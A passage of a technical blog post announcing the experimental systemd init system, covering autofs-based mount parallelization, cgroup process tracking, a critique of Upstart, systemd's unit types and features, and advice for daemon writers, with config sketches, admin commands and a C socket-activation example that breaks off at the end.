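For reference, bus activation is driven by small service description files that map a bus name to an executable; a minimal sketch for the session bus (the name and binary are made-up examples):

# /usr/share/dbus-1/services/org.example.Frobnicator.service
[D-BUS Service]
Name=org.example.Frobnicator
Exec=/usr/bin/frobnicatord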

And if that’s not great, then I don’t know what is
great!

Parallelizing File System Jobs

If you look at
the serialization graphs of the boot process
of current
distributions, there are more synchronisation points than just
daemon start-ups: most prominently there are file-system related
jobs: mounting, fscking, quota. Right now, on boot-up a lot of
time is spent idling to wait until all devices that are listed in
/etc/fstab show up in the device tree and are then
fsck’ed, mounted, quota checked (if enabled). Only after that is
fully finished do we go on and boot the actual services.

Can we improve this? It turns out we can. Harald Hoyer came up
with the idea of using the venerable autofs system for this:

Just like a connect() call shows that a service is
interested in another service, an open() (or a similar
call) shows that a service is interested in a specific file or
file-system. So, in order to improve how much we can parallelize
we can make those apps wait only if a file-system they are looking
for is not yet mounted and readily available: we set up an autofs
mount point, and then when our file-system finished fsck and quota
due to normal boot-up we replace it by the real mount. While the
file-system is not ready yet, the access will be queued by the
kernel and the accessing process will block, but only that one
daemon and only that one access. And this way we can begin
starting our daemons even before all file systems have been fully
made available — without them missing any files, and maximizing
parallelization.

Parallelizing file system jobs and service jobs does
not make sense for /, after all that’s where the service
binaries are usually stored. However, for file-systems such as
/home, that usually are bigger, even encrypted, possibly
remote and seldom accessed by the usual boot-up daemons, this
can improve boot time considerably. It is probably not necessary
to mention this, but virtual file systems, such as
procfs or sysfs should never be mounted via autofs.

I wouldn’t be surprised if some readers might find integrating
autofs in an init system a bit fragile and even weird, and maybe
more on the “crackish” side of things. However, having played
around with this extensively I can tell you that this actually
feels quite right. Using autofs here simply means that we can
create a mount point without having to provide the backing file
system right-away. In effect it hence only delays accesses. If an
application tries to access an autofs file-system and we take very
long to replace it with the real file-system, it will hang in an
interruptible sleep, meaning that you can safely cancel it, for
example via C-c. Also note that at any point, if the mount point
should not be mountable in the end (maybe because fsck failed), we
can just tell autofs to return a clean error code (like
ENOENT). So, I guess what I want to say is that even though
integrating autofs into an init system might appear adventurous at
first, our experimental code has shown that this idea works
surprisingly well in practice — if it is done for the right
reasons and the right way.

Also note that these should be direct autofs
mounts, meaning that from an application perspective there’s
little effective difference between a classic mount point and one
based on autofs.
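
For the curious, a classic direct autofs map that defers the mounting of /home would look roughly like this (a sketch only; the device name is made up, and systemd does not literally use these files):

# /etc/auto.master: declare a direct map
/-      /etc/auto.direct

# /etc/auto.direct: mount /home on first access
/home   -fstype=ext4    :/dev/sda3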

Keeping the First User PID Small

Another thing we can learn from the MacOS boot-up logic is
that shell scripts are evil. Shell is fast and shell is slow. It
is fast to hack, but slow in execution. The classic sysvinit boot
logic is modelled around shell scripts. Whether it is
/bin/bash or any other shell (that was written to make
shell scripts faster), in the end the approach is doomed to be
slow. On my system the scripts in /etc/init.d call
grep at least 77 times. awk is called 92
times, cut 23 and sed 74. Every time those
commands (and others) are called, a process is spawned, the
libraries searched, some start-up stuff like i18n and so on set up
and more. And then after seldom doing more than a trivial string
operation the process is terminated again. Of course, that has to
be incredibly slow. No other language but shell would do something like
that. On top of that, shell scripts are also very fragile, and
change their behaviour drastically based on environment variables
and suchlike, stuff that is hard to oversee and control.
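
If you want a rough impression of this on your own system, a crude one-liner that counts textual occurrences (not actual boot-time invocations) in a sysvinit-style /etc/init.d will do:

$ grep -how 'grep\|awk\|sed\|cut' /etc/init.d/* | sort | uniq -c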

So, let’s get rid of shell scripts in the boot process! Before
we can do that we need to figure out what they are currently
actually used for: well, the big picture is that most of the time,
what they do is actually quite boring. Most of the scripting is
spent on trivial setup and tear-down of services, and should be
rewritten in C, either in separate executables, or moved into the
daemons themselves, or simply be done in the init system.

It is not likely that we can get rid of shell scripts during
system boot-up entirely anytime soon. Rewriting them in C takes
time, in a few case does not really make sense, and sometimes
shell scripts are just too handy to do without. But we can
certainly make them less prominent.

A good metric for measuring shell script infestation of the
boot process is the PID number of the first process you can start
after the system is fully booted up. Boot up, log in, open a
terminal, and type echo $$. Try that on your Linux
system, and then compare the result with MacOS! (Hint, it’s
something like this: Linux PID 1823; MacOS PID 154, measured on
test systems we own.)

Keeping Track of Processes

A central part of a system that starts up and maintains
services should be process babysitting: it should watch
services. Restart them if they shut down. If they crash it should
collect information about them, and keep it around for the
administrator, and cross-link that information with what is
available from crash dump systems such as abrt, and in logging
systems like syslog or the audit system.

It should also be capable of shutting down a service
completely. That might sound easy, but is harder than you
think. Traditionally on Unix a process that does double-forking
can escape the supervision of its parent, and the old parent will
not learn about the relation of the new process to the one it
actually started. An example: currently, a misbehaving CGI script
that has double-forked is not terminated when you shut down
Apache. Furthermore, you will not even be able to figure out its
relation to Apache, unless you know it by name and purpose.

So, how can we keep track of processes, so that they cannot
escape the babysitter, and that we can control them as one unit
even if they fork a gazillion times?

Different people came up with different solutions for this. I
am not going into much detail here, but let’s at least say that
approaches based on ptrace or the netlink connector (a kernel
interface which allows you to get a netlink message each time any
process on the system fork()s or exit()s) that some people have
investigated and implemented, have been criticised as ugly and not
very scalable.

So what can we do about this? Well, since quite a while the
kernel knows Control
Groups
(aka “cgroups”). Basically they allow the creation of a
hierarchy of groups of processes. The hierarchy is directly
exposed in a virtual file-system, and hence easily accessible. The
group names are basically directory names in that file-system. If
a process belonging to a specific cgroup fork()s, its child will
become a member of the same group. Unless it is privileged and has
access to the cgroup file system it cannot escape its
group. Originally, cgroups have been introduced into the kernel
for the purpose of containers: certain kernel subsystems can
enforce limits on resources of certain groups, such as limiting
CPU or memory usage. Traditional resource limits (as implemented
by setrlimit()) are (mostly) per-process. cgroups on the
other hand let you enforce limits on entire groups of
processes. cgroups are also useful to enforce limits outside of
the immediate container use case. You can use it for example to
limit the total amount of memory or CPU Apache and all its
children may use. Then, a misbehaving CGI script can no longer
escape your setrlimit() resource control by simply
forking away.

In addition to container and resource limit enforcement cgroups
are very useful to keep track of daemons: cgroup membership is
securely inherited by child processes, they cannot escape. There’s
a notification system available so that a supervisor process can
be notified when a cgroup runs empty. You can find the cgroups of
a process by reading /proc/$PID/cgroup. cgroups hence
make a very good choice to keep track of processes for babysitting
purposes.
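
You can watch this from a shell, assuming a cgroup v1 hierarchy with the cpu controller mounted under /sys/fs/cgroup/cpu (paths differ between distributions):

$ sudo mkdir /sys/fs/cgroup/cpu/babysit
$ echo $$ | sudo tee /sys/fs/cgroup/cpu/babysit/tasks
# the shell, and every process it forks from now on, shows up in the group
$ cat /proc/self/cgroup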

Controlling the Process Execution Environment

A good babysitter should not only oversee and control when a
daemon starts, ends or crashes, but also set up a good, minimal,
and secure working environment for it.

That means setting obvious process parameters such as the
setrlimit() resource limits, user/group IDs or the
environment block, but does not end there. The Linux kernel gives
users and administrators a lot of control over processes (some of
it is rarely used, currently). For each process you can set CPU
and IO scheduler controls, the capability bounding set, CPU
affinity or of course cgroup environments with additional limits,
and more.

As an example, ioprio_set() with
IOPRIO_CLASS_IDLE is a great way to minimize the effect
of locate‘s updatedb on system interactivity.
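
The shell-level counterpart of that call is the ionice utility; for example, a sketch of running updatedb in the idle I/O class:

$ sudo ionice -c 3 updatedb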

On top of that certain high-level controls can be very useful,
such as setting up read-only file system overlays based on
read-only bind mounts. That way one can run certain daemons so
that all (or some) file systems appear read-only to them, so that
EROFS is returned on every write request. As such this can be used
to lock down what daemons can do, in a fashion similar to a poor
man’s SELinux policy system (but this certainly doesn’t replace
SELinux, don’t get any bad ideas, please).
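
Done by hand, such a read-only view is a two-step bind mount (a sketch; on many kernels the read-only flag can only be applied on the remount):

$ sudo mount --bind /var/www /var/www
$ sudo mount -o remount,ro,bind /var/www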

Finally logging is an important part of executing services:
ideally every bit of output a service generates should be logged
away. An init system should hence provide logging to daemons it
spawns right from the beginning, and connect stdout and stderr to
syslog or in some cases even /dev/kmsg which in many
cases makes a very useful replacement for syslog (embedded folks,
listen up!), especially in times where the kernel log buffer is
configured ridiculously large out-of-the-box.

On Upstart

To begin with, let me emphasize that I actually like the code
of Upstart, it is very well commented and easy to
follow. It’s certainly something other projects should learn
from (including my own).

That being said, I can’t say I agree with the general approach
of Upstart. But first, a bit more about the project:

Upstart does not share code with sysvinit, and its
functionality is a super-set of it, and provides compatibility to
some degree with the well known SysV init scripts. Its main
feature is its event-based approach: starting and stopping of
processes is bound to “events” happening in the system, where an
“event” can be a lot of different things, such as: a network
interface becomes available or some other software has been
started.

Upstart does service serialization via these events: if the
syslog-started event is triggered this is used as an
indication to start D-Bus since it can now make use of Syslog. And
then, when dbus-started is triggered,
NetworkManager is started, since it may now use
D-Bus, and so on.

One could say that this way the actual logical dependency tree
that exists and is understood by the admin or developer is
translated and encoded into event and action rules: every logical
“a needs b” rule that the administrator/developer is aware of
becomes a “start a when b is started” plus “stop a when b is
stopped”. In some way this certainly is a simplification:
especially for the code in Upstart itself. However I would argue
that this simplification is actually detrimental. First of all,
the logical dependency system does not go away, the person who is
writing Upstart files must now translate the dependencies manually
into these event/action rules (actually, two rules for each
dependency). So, instead of letting the computer figure out what
to do based on the dependencies, the user has to manually
translate the dependencies into simple event/action rules. Also,
because the dependency information has never been encoded it is
not available at runtime, effectively meaning that an
administrator who tries to figure out why something
happened, i.e. why a is started when b is started, has no chance
of finding that out.

Furthermore, the event logic turns all dependencies on their
head. Instead of minimizing the
amount of work (which is something that a good init system should
focus on, as pointed out in the beginning of this blog story), it
actually maximizes the amount of work to do during
operations. Or in other words, instead of having a clear goal and
only doing the things it really needs to do to reach the goal, it
does one step, and then after finishing it, it does all
steps that possibly could follow it.

Or to put it simpler: the fact that the user just started D-Bus
is in no way an indication that NetworkManager should be started
too (but this is what Upstart would do). It’s right the other way
round: when the user asks for NetworkManager, that is definitely
an indication that D-Bus should be started too (which is certainly
what most users would expect, right?).

A good init system should start only what is needed, and that
on-demand. Either lazily or parallelized and in advance. However
it should not start more than necessary, particularly not
everything installed that could use that service.

Finally, I fail to see the actual usefulness of the event
logic. It appears to me that most events that are exposed in
Upstart actually are not punctual in nature, but have duration: a
service starts, is running, and stops. A device is plugged in, is
available, and is plugged out again. A mount point is in the
process of being mounted, is fully mounted, or is being
unmounted. A power plug is plugged in, the system runs on AC, and
the power plug is pulled. Only a minority of the events an init
system or process supervisor should handle are actually punctual,
most of them are tuples of start, condition, and stop. This
information is again not available in Upstart, because it focuses
on singular events and ignores durable dependencies.

Now, I am aware that some of the issues I pointed out above are
in some way mitigated by certain more recent changes in Upstart,
particularly condition-based syntaxes such as start on
(local-filesystems and net-device-up IFACE=lo)
in Upstart
rule files. However, to me this appears mostly as an attempt to
fix a system whose core design is flawed.

Besides that, Upstart does OK at babysitting daemons, even though
some choices might be questionable (see above), and there are certainly a lot
of missed opportunities (see above, too).

There are other init systems besides sysvinit, Upstart and
launchd. Most of them offer little of substance beyond Upstart or
sysvinit. The most interesting other contender is Solaris SMF,
which supports proper dependencies between services. However, in
many ways it is overly complex and, let’s say, a bit academic
with its excessive use of XML and new terminology for known
things. It is also closely bound to Solaris specific features such
as the contract system.

Putting it All Together: systemd

Well, this is another good time for a little pause, because
after I have hopefully explained above what I think a good PID 1
should be doing and what the current most used system does, we’ll
now come to where the beef is. So, go and refill your coffee mug
again. It’s going to be worth it.

You probably guessed it: what I suggested above as requirements
and features for an ideal init system is actually available now,
in a (still experimental) init system called systemd, which I
hereby want to announce. Again, here's the
code.
And here’s a quick rundown of its features, and the
rationale behind them:

systemd starts up and supervises the entire system (hence the
name…). It implements all of the features pointed out above and
a few more. It is based around the notion of units. Units
have a name and a type. Since their configuration is usually
loaded directly from the file system, these unit names are
actually file names. Example: a unit avahi.service is
read from a configuration file by the same name, and of course
could be a unit encapsulating the Avahi daemon. There are several
kinds of units:

  1. service: these are the most obvious kind of unit:
    daemons that can be started, stopped, restarted, reloaded. For
    compatibility with SysV we not only support our own
    configuration files for services, but also are able to read
    classic SysV init scripts, in particular we parse the LSB
    header, if it exists. /etc/init.d is hence not much
    more than just another source of configuration.
  2. socket: this unit encapsulates a socket in the
    file-system or on the Internet. We currently support AF_INET,
    AF_INET6, AF_UNIX sockets of the types stream, datagram, and
    sequential packet. We also support classic FIFOs as
    transport. Each socket unit has a matching
    service unit, which is started when the first connection
    comes in on the socket or FIFO. Example: nscd.socket
    starts nscd.service on an incoming connection. (A minimal
    sketch of such a pair follows this list.)
  3. device: this unit encapsulates a device in the
    Linux device tree. If a device is marked for this via udev
    rules, it will be exposed as a device unit in
    systemd. Properties set with udev can be used as
    configuration source to set dependencies for device units.
  4. mount: this unit encapsulates a mount point in the
    file system hierarchy. systemd monitors all mount points as
    they come and go, and can also be used to mount or
    unmount mount-points. /etc/fstab is used here as an
    additional configuration source for these mount points, similar to
    how SysV init scripts can be used as additional configuration
    source for service units.
  5. automount: this unit type encapsulates an automount
    point in the file system hierarchy. Each automount
    unit has a matching mount unit, which is started
    (i.e. mounted) as soon as the automount directory is
    accessed.
  6. target: this unit type is used for logical
    grouping of units: instead of actually doing anything by itself
    it simply references other units, which thereby can be controlled
    together. Examples for this are: multi-user.target,
    which is a target that basically plays the role of run-level 5 on
    a classic SysV system, or bluetooth.target which is
    requested as soon as a bluetooth dongle becomes available and
    which simply pulls in bluetooth related services that otherwise
    would not need to be started: bluetoothd and
    obexd and suchlike.
  7. snapshot: similar to target units
    snapshots do not actually do anything themselves and their only
    purpose is to reference other units. Snapshots can be used to
    save/rollback the state of all services and units of the init
    system. Primarily it has two intended use cases: to allow the
    user to temporarily enter a specific state such as “Emergency
    Shell”, terminating current services, and provide an easy way to
    return to the state before, pulling up all services again that
    got temporarily pulled down. And to ease support for system
    suspend: many services still cannot correctly deal with
    system suspend, and it is often a better idea to shut them down
    before suspend and restore them afterwards.
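
To make the socket/service pairing described in item 2 a bit more
concrete, here is a purely illustrative sketch of what such a pair
of unit files might look like. The file names are invented, and the
exact directive names (ListenStream=, ExecStart= and so on) are
assumptions on my part and may not match this early snapshot
exactly:

  # /etc/systemd/system/mydaemon.socket (hypothetical)
  [Unit]
  Description=Socket for mydaemon

  [Socket]
  # systemd listens here; mydaemon.service is started on the first connection
  ListenStream=/var/run/mydaemon.sock

  # /etc/systemd/system/mydaemon.service (hypothetical)
  [Unit]
  Description=Socket-activated example daemon

  [Service]
  # The daemon inherits the listening socket via $LISTEN_FDS (see below)
  ExecStart=/usr/sbin/mydaemon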

All these units can have dependencies between each other (both
positive and negative, i.e. ‘Requires’ and ‘Conflicts’): a device
can have a dependency on a service, meaning that as soon as a
device becomes available a certain service is started. Mounts get
an implicit dependency on the device they are mounted from. Mounts
also get implicit dependencies on mounts that are their prefixes
(i.e. a mount /home/lennart implicitly gets a dependency
added to the mount for /home) and so on.
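
As a small illustrative sketch (the directive names follow the
Requires/Conflicts/After vocabulary used in this post; the exact
spelling in the configuration files is an assumption), such
dependencies might be declared like this in a unit:

  # Hypothetical fragment of a service unit
  [Unit]
  Description=Example daemon
  # Positive requirement dependency: pull in D-Bus
  Requires=dbus.service
  # Ordering, orthogonal to Requires (see the feature list below)
  After=dbus.service
  # Negative requirement dependency
  Conflicts=emergency.service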

A short list of other features:

  1. For each process that is spawned, you may control: the
    environment, resource limits, working and root directory, umask,
    OOM killer adjustment, nice level, IO class and priority, CPU policy
    and priority, CPU affinity, timer slack, user id, group id,
    supplementary group ids, readable/writable/inaccessible
    directories, shared/private/slave mount flags,
    capabilities/bounding set, secure bits, CPU scheduler reset on
    fork, private /tmp name-space, cgroup control for
    various subsystems. Also, you can easily connect
    stdin/stdout/stderr of services to syslog, /dev/kmsg,
    arbitrary TTYs. If connected to a TTY for input systemd will make
    sure a process gets exclusive access, optionally waiting or enforcing
    it.
  2. Every executed process gets its own cgroup (currently by
    default in the debug subsystem, since that subsystem is not
    otherwise used and does not do much more than the most basic
    process grouping), and it is very easy to configure systemd to
    place services in cgroups that have been configured externally,
    for example via the libcgroups utilities.
  3. The native configuration files use a syntax that closely
    follows the well-known .desktop files. It is a simple syntax for
    which parsers exist already in many software frameworks. Also, this
    allows us to rely on existing tools for i18n for service
    descriptions, and similar. Administrators and developers don’t
    need to learn a new syntax.
  4. As mentioned, we provide compatibility with SysV init
    scripts. We take advantage of LSB and Red Hat chkconfig headers
    if they are available. If they aren’t we try to make the best of
    the otherwise available information, such as the start
    priorities in /etc/rc.d. These init scripts are simply
    considered a different source of configuration, hence an easy
    upgrade path to proper systemd services is available. Optionally
    we can read classic PID files for services to identify the main
    pid of a daemon. Note that we make use of the dependency
    information from the LSB init script headers, and translate
    those into native systemd dependencies. Side note: Upstart is
    unable to harvest and make use of that information. Boot-up on a
    plain Upstart system with mostly LSB SysV init scripts will
    hence not be parallelized; a similar system running systemd,
    however, will. In fact, for Upstart all SysV scripts together
    make one job that is executed, they are not treated
    individually, again in contrast to systemd where SysV init
    scripts are just another source of configuration and are all
    treated and controlled individually, much like any other native
    systemd service.
  5. Similarly, we read the existing /etc/fstab
    configuration file, and consider it just another source of
    configuration. Using the comment= fstab option you can
    even mark /etc/fstab entries to become systemd
    controlled automount points.
  6. If the same unit is configured in multiple configuration
    sources (e.g. /etc/systemd/system/avahi.service exists,
    and /etc/init.d/avahi too), then the native
    configuration will always take precedence and the legacy format is
    ignored, allowing an easy upgrade path, and allowing packages to
    carry both a SysV init script and a systemd service file for a
    while.
  7. We support a simple templating/instance mechanism. Example:
    instead of having six configuration files for six gettys, we
    only have one getty@.service file which gets instantiated to
    getty@tty2.service and suchlike. The interface part can
    even be inherited by dependency expressions, i.e. it is easy to
    encode that a service dhcpcd@eth0.service pulls in
    avahi-autoipd@eth0.service, while leaving the
    eth0 string wild-carded. (See the sketch after this list.)
  8. For socket activation we support full compatibility with the
    traditional inetd modes, as well as a very simple mode that
    tries to mimic launchd socket activation and is recommended for
    new services. The inetd mode only allows passing one socket to
    the started daemon, while the native mode supports passing
    arbitrary numbers of file descriptors. We also support one
    instance per connection, as well as one instance for all
    connections modes. In the former mode we name the cgroup the
    daemon will be started in after the connection parameters, and
    utilize the templating logic mentioned above for this. Example:
    sshd.socket might spawn services
    sshd@192.168.0.1-4711-192.168.0.2-22.service with a
    cgroup of sshd@.service/192.168.0.1-4711-192.168.0.2-22
    (i.e. the IP address and port numbers are used in the instance
    names. For AF_UNIX sockets we use PID and user id of the
    connecting client). This provides a nice way for the
    administrator to identify the various instances of a daemon and
    control their runtime individually. The native socket passing
    mode is very easily implementable in applications: if
    $LISTEN_FDS is set it contains the number of sockets
    passed and the daemon will find them sorted as listed in the
    .service file, starting from file descriptor 3 (a
    nicely written daemon could also use fstat() and
    getsockname() to identify the sockets in case it
    receives more than one). In addition we set $LISTEN_PID
    to the PID of the daemon that shall receive the fds, because
    environment variables are normally inherited by sub-processes and
    hence could confuse processes further down the chain. Even
    though this socket passing logic is very simple to implement in
    daemons, we will provide a BSD-licensed reference implementation
    that shows how to do this. We have ported a couple of existing
    daemons to this new scheme.
  9. We provide compatibility with /dev/initctl to a
    certain extent. This compatibility is in fact implemented with a
    FIFO-activated service, which simply translates these legacy
    requests to D-Bus requests. Effectively this means the old
    shutdown, poweroff and similar commands from
    Upstart and sysvinit continue to work with
    systemd.
  10. We also provide compatibility with utmp and
    wtmp. Possibly even to an extent that is far more
    than healthy, given how crufty utmp and wtmp
    are.
  11. systemd supports several kinds of
    dependencies between units. After/Before can be used to fix
    the order in which units are activated. It is completely
    orthogonal to Requires and Wants, which
    express a positive requirement dependency, either mandatory, or
    optional. Then, there is Conflicts which
    expresses a negative requirement dependency. Finally, there are
    three further, less used dependency types.
  12. systemd has a minimal transaction system. Meaning: if a unit
    is requested to start up or shut down we will add it and all its
    dependencies to a temporary transaction. Then, we will
    verify if the transaction is consistent (i.e. whether the
    ordering via After/Before of all units is
    cycle-free). If it is not, systemd will try to fix it up, and
    removes non-essential jobs from the transaction that might
    remove the loop. Also, systemd tries to suppress non-essential
    jobs in the transaction that would stop a running
    service. Non-essential jobs are those which the original request
    did not directly include but which were pulled in by
    Wants-type dependencies. Finally we check whether
    the jobs of the transaction contradict jobs that have already
    been queued, and optionally the transaction is aborted then. If
    all worked out and the transaction is consistent and minimized
    in its impact it is merged with all already outstanding jobs and
    added to the run queue. Effectively this means that before
    executing a requested operation, we will verify that it makes
    sense, fixing it if possible, and only failing if it really cannot
    work.
  13. We record start/exit time as well as the PID and exit status
    of every process we spawn and supervise. This data can be used
    to cross-link daemons with their data in abrtd, auditd and
    syslog. Think of a UI that will highlight crashed daemons for
    you, and allows you to easily navigate to the respective UIs for
    syslog, abrt, and auditd that will show the data generated from
    and for this daemon on a specific run.
  14. We support reexecution of the init process itself at any
    time. The daemon state is serialized before the reexecution and
    deserialized afterwards. That way we provide a simple way to
    facilitate init system upgrades as well as handover from an
    initrd daemon to the final daemon. Open sockets and autofs
    mounts are properly serialized away, so that they stay
    connectible all the time, in a way that clients will not even
    notice that the init system reexecuted itself. Also, the fact
    that a big part of the service state is encoded anyway in the
    cgroup virtual file system would even allow us to resume
    execution without access to the serialization data. The
    reexecution code paths are actually mostly the same as the init
    system configuration reloading code paths, which
    guarantees that reexecution (which is probably more seldom
    triggered) gets similar testing as reloading (which is probably
    more common).
  15. Starting the work of removing shell scripts from the boot
    process we have recoded part of the basic system setup in C and
    moved it directly into systemd. Among that is mounting of the API
    file systems (i.e. virtual file systems such as /proc,
    /sys and /dev) and setting of the
    hostname.
  16. Server state is introspectable and controllable via
    D-Bus. This is not complete yet but quite extensive.
  17. While we want to emphasize socket-based and bus-name-based
    activation, and we hence support dependencies between sockets and
    services, we also support traditional inter-service
    dependencies. We support multiple ways for such a service to
    signal its readiness: by forking and having the start process
    exit (i.e. traditional daemonize() behaviour), as well
    as by watching the bus until a configured service name appears.
  18. There’s an interactive mode which asks for confirmation each
    time a process is spawned by systemd. You may enable it by
    passing systemd.confirm_spawn=1 on the kernel command
    line.
  19. With the systemd.default= kernel command line
    parameter you can specify which unit systemd should start on
    boot-up. Normally you’d specify something like
    multi-user.target here, but another choice could even
    be a single service instead of a target, for example
    out-of-the-box we ship a service emergency.service that
    is similar in its usefulness to init=/bin/bash, but
    has the advantage of actually running the init system, hence
    offering the option to boot up the full system from the
    emergency shell.
  20. There’s a minimal UI that allows you to
    start/stop/introspect services. It’s far from complete but
    useful as a debugging tool. It’s written in Vala (yay!) and goes
    by the name of systemadm.
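
To make the templating/instance mechanism from item 7 above a bit
more tangible, here is a hypothetical sketch. The %i specifier used
to refer to the wildcarded instance string is how current systemd
spells this; for the early snapshot described here it should be read
as an assumption, and the paths are illustrative only:

  # /etc/systemd/system/dhcpcd@.service (hypothetical template)
  [Unit]
  Description=DHCP client on %i
  # Pull in the matching avahi-autoipd instance while leaving the
  # interface name wild-carded; starting dhcpcd@eth0.service would
  # then also pull in avahi-autoipd@eth0.service.
  Wants=avahi-autoipd@%i.service

  [Service]
  # /sbin/dhcpcd is just an illustrative path
  ExecStart=/sbin/dhcpcd %i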

It should be noted that systemd uses many Linux-specific
features, and does not limit itself to POSIX. That unlocks a lot
of functionality a system that is designed for portability to
other operating systems cannot provide.

Status

All the features listed above are already implemented. Right
now systemd can already be used as a drop-in replacement for
Upstart and sysvinit (at least as long as there aren't too many
native Upstart services installed; thankfully most distributions
don't carry many of those yet).

However, testing has been minimal, our version number is
currently at an impressive 0. Expect breakage if you run this in
its current state. That said, overall it should be quite stable
and some of us already boot our normal development systems with
systemd (not just in VMs). YMMV, especially if you try
this on distributions we developers don’t use.

Where is This Going?

The feature set described above is certainly already
comprehensive. However, we have a few more things on our plate. I
don’t really like speaking too much about big plans, but here’s a
short overview of the direction in which we will be pushing this:

We want to add at least two more unit types: swap
shall be used to control swap devices the same way we
already control mounts, i.e. with automatic dependencies on the
device tree devices they are activated from, and
suchlike. timer shall provide functionality similar to
cron, i.e. start services based on time events, the
focus being both monotonic clock and wall-clock/calendar
events (i.e. “start this 5h after it last ran” as well as “start
this every Monday at 5 am”).
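
Purely to illustrate the idea (no such unit type exists yet in the
snapshot described here, so every name below is hypothetical), a
timer unit might one day look roughly like this:

  # mybackup.timer (hypothetical future unit)
  [Unit]
  Description=Run mybackup.service periodically

  [Timer]
  # Wall-clock/calendar event: every Monday at 5 am
  OnCalendar=Mon 05:00
  # Monotonic event: 5h after the service last ran
  OnUnitActiveSec=5h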

More importantly however, it is also our plan to experiment with
systemd not only for optimizing boot times, but also to make it
the ideal session manager, to replace (or possibly just augment)
gnome-session, kdeinit and similar daemons. The problem sets of a
session manager and an init system are very similar: quick start-up
is essential, and babysitting processes is the focus. Using the same
code for both uses hence suggests itself. Apple recognized that
and does just that with launchd. And so should we: socket and bus
based activation and parallelization is something session services
and system services can benefit from equally.

I should probably note that all three of these features are
already partially available in the current code base, but not
complete yet. For example, you can already run systemd just fine
as a normal user; it will detect that it is being run that way.
Support for this mode has been available since the very beginning
and is part of the very core. (It is also exceptionally useful for
debugging! This works fine even without having the system
otherwise converted to systemd for booting.)

However, there are some things we probably should fix in the
kernel and elsewhere before finishing work on this: we
need swap status change notifications from the kernel similar to
how we can already subscribe to mount changes; we want a
notification when CLOCK_REALTIME jumps relative to
CLOCK_MONOTONIC; we want to allow normal processes to get
some init-like powers; we need a well-defined
place where we can put user sockets. None of these issues are
really essential for systemd, but they’d certainly improve
things.

You Want to See This in Action?

Currently, there are no tarball releases, but it should be
straightforward to check out the code from our
repository. In addition, to have something to start with, here's
a tarball with unit configuration files that allows an
otherwise unmodified Fedora 13 system to work with systemd. We
have no RPMs to offer you for now.

An easier way is to download this Fedora 13 qemu image, which
has been prepared for systemd. In the grub menu you can select
whether you want to boot the system with Upstart or systemd. Note
that this system is only minimally modified. Service information
is read exclusively from the existing SysV init scripts. Hence it
will not take advantage of the full socket and bus-based
parallelization pointed out above, however it will interpret the
parallelization hints from the LSB headers, and hence boots faster
than the Upstart system, which in Fedora does not employ any
parallelization at the moment. The image is configured to output
debug information on the serial console, as well as writing it to
the kernel log buffer (which you may access with dmesg).
You might want to run qemu configured with a virtual
serial terminal. All passwords are set to systemd.

Even simpler than downloading and booting the qemu image is
looking at pretty screen-shots. Since an init system usually is
well hidden beneath the user interface, some shots of
systemadm and ps must do:

[Screenshot: systemadm]

That’s systemadm showing all loaded units, with more detailed
information on one of the getty instances.

[Screenshot: ps output]

That’s an excerpt of the output of ps xaf -eo
pid,user,args,cgroup
showing how neatly the processes are
sorted into the cgroup of their service. (The fourth column is the
cgroup, the debug: prefix is shown because we use the
debug cgroup controller for systemd, as mentioned earlier. This is
only temporary.)

Note that both of these screenshots show an only minimally
modified Fedora 13 Live CD installation, where services are
exclusively loaded from the existing SysV init scripts. Hence,
this does not use socket or bus activation for any existing
service.

Sorry, no bootcharts or hard data on start-up times for the
moment. We’ll publish that as soon as we have fully parallelized
all services from the default Fedora install. Then, we’ll welcome
you to benchmark the systemd approach, and provide our own
benchmark data as well.

Well, presumably everybody will keep bugging me about this, so
here are two numbers I’ll tell you. However, they are completely
unscientific as they are measured for a VM (single CPU) and by
using the stop timer in my watch. Fedora 13 booting up with
Upstart takes 27s, with systemd we reach 24s (from grub to gdm,
same system, same settings, the shorter of two boot-ups, one
immediately following the other). Note however that this shows
nothing more than the speedup effect reached by using the LSB
dependency information parsed from the init script headers for
parallelization. Socket or bus based activation was not utilized
for this, and hence these numbers are unsuitable to assess the
ideas pointed out above. Also, systemd was set to debug verbosity
levels on a serial console. So again, this benchmark data has
barely any value.

Writing Daemons

An ideal daemon for use with systemd does a few things
differently than things were traditionally done. Later on, we will
publish a longer guide explaining and suggesting how to write a daemon for use
with systemd. Basically, things get simpler for daemon
developers:

  • We ask daemon writers not to fork or even double fork
    in their processes, but run their event loop from the initial process
    systemd starts for you. Also, don’t call setsid().
  • Don’t drop user privileges in the daemon itself, leave this
    to systemd and configure it in systemd service configuration
    files. (There are exceptions here. For example, for some daemons
    there are good reasons to drop privileges inside the daemon
    code, after an initialization phase that requires elevated
    privileges.)
  • Don’t write PID files
  • Grab a name on the bus
  • You may rely on systemd for logging; you are welcome to log
    whatever you need to log to stderr.
  • Let systemd create and watch sockets for you, so that socket
    activation works. Hence, interpret $LISTEN_FDS and
    $LISTEN_PID as described above (see the sketch below).
  • Use SIGTERM for requesting shutdowns of your daemon.
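
To make the list above more concrete, here is a minimal, hedged
sketch in C (this is not the reference implementation mentioned
above, just an illustration of the protocol as described in this
post) of a daemon that stays in the foreground, logs to stderr,
exits on SIGTERM, and picks up a single socket passed via
$LISTEN_FDS/$LISTEN_PID, starting at file descriptor 3:

  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>
  #include <signal.h>
  #include <unistd.h>
  #include <sys/socket.h>

  #define SD_LISTEN_FDS_START 3  /* passed sockets start at fd 3, as described above */

  static volatile sig_atomic_t quit = 0;

  static void handle_sigterm(int sig) {
          (void) sig;
          quit = 1;               /* SIGTERM requests a clean shutdown */
  }

  int main(void) {
          const char *pid_str = getenv("LISTEN_PID");
          const char *fds_str = getenv("LISTEN_FDS");
          struct sigaction sa;

          memset(&sa, 0, sizeof(sa));
          sa.sa_handler = handle_sigterm;
          sigaction(SIGTERM, &sa, NULL);  /* no SA_RESTART, so accept() is interrupted */

          /* Only trust the variables if they are really meant for us. */
          if (!pid_str || !fds_str || (pid_t) atol(pid_str) != getpid()) {
                  fprintf(stderr, "Not socket activated, giving up in this sketch.\n");
                  return EXIT_FAILURE;
          }

          if (atoi(fds_str) < 1) {
                  fprintf(stderr, "No sockets passed.\n");
                  return EXIT_FAILURE;
          }

          /* We simply use the first passed socket; a real daemon could use
           * fstat() and getsockname() to tell multiple sockets apart. */
          while (!quit) {
                  int client = accept(SD_LISTEN_FDS_START, NULL, NULL);

                  if (client < 0)
                          continue;       /* e.g. EINTR when SIGTERM arrives */

                  /* Handle the connection; here we just greet and hang up. */
                  (void) write(client, "hello\n", 6);
                  close(client);
          }

          fprintf(stderr, "Exiting on SIGTERM.\n");
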